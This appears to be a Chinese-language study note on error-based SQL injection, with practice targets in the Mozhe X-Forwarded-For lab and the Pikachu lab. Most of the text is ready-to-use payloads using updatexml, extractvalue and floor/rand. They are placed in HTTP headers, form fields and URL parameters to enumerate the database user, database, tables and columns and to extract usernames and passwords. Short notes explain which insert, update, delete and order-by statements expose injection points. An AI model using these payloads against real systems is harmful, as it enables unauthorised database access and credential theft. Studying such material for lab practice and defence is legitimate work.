当进行 SQL 注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是 SQL 语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL 语句大概写法也能更好的选择对应的注入语句。
基于报错的 SQL 盲注-报错回显
floor,updatexml,extractvalue
x-forwarded-for和host等http请求头也存在注入点
靶场:墨者x-forwarded-for
爆当前用户权限
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select user()) ,0x7e),1)
爆当前用户数据库
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select database()) ,0x7e),1)
获取第一个表名
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='webcalendar' limit 0,1),0x7e),1)
获取第二个表名
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='webcalendar' limit 1,1),0x7e),1)
获取第一个字段
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='webcalendar' and table_name='user' limit 0,1),0x7e),1)
获取第二个字段
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='webcalendar' and table_name='user' limit 1,1),0x7e),1)
获取第三个字段
X-Forwarded-For:127.0.0.1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='webcalendar' and table_name='user' limit 2,1),0x7e),1)
获取字段内容
X-Forwarded-For:127.0.0.1', updatexml(1,concat(0x7e,(select concat(username,password) from user limit 0,1) ,0x7e),1)
select 查询数据
在网站应用中进行数据显示查询操作
select *from news where id = $id
insert 插入数据
在网站应用中进行用户注册添加等操作
insert into news(id,url,text) values (2,'x','$t')
delete 删除数据
后台管理里面文章删除用户等操作
delete from news where id=$id
update 更新数据
会员或后台中心数据同步或缓存等操作
update user set pwd='$p' where id=2 and username='admin'
order by 排序数列
一般结合表名或列名进行数据排序操作
select * from news order by $id
select id,name,price from news order by $order
username=x' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '
&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
username=x' or updatexml(1,concat(0x7e,(version())),0) or
'&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
username=x' or extractvalue(1,concat(0x7e,database())) or
'&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or (select 1 from(select
count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '&email=wuhan&submit=submit
sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or
updatexml(1,concat(0x7e,(version())),0) or '&email=wuhan&submit=submit
sex=%E7%94%B7&phonenum=13878787788&add=Nicky' or extractvalue(1,concat(0x7e,database())) or '&email=wuhan&submit=submit
/pikachu/vul/sqli/sqli_del.php?id=56+or+(select+1+from(select+count(*),concat(floor(rand(0)*2),0x7e,(database()),0x7e)x+from+information_schema.character_sets+group+by+x)a)
pikachu/vul/sqli/sqli_del.php?id=56+or+updatexml+(1,concat(0x7e,database()),0)
/pikachu/vul/sqli/sqli_del.php?id=56+or+extractvalue(1,concat(0x7e,database()))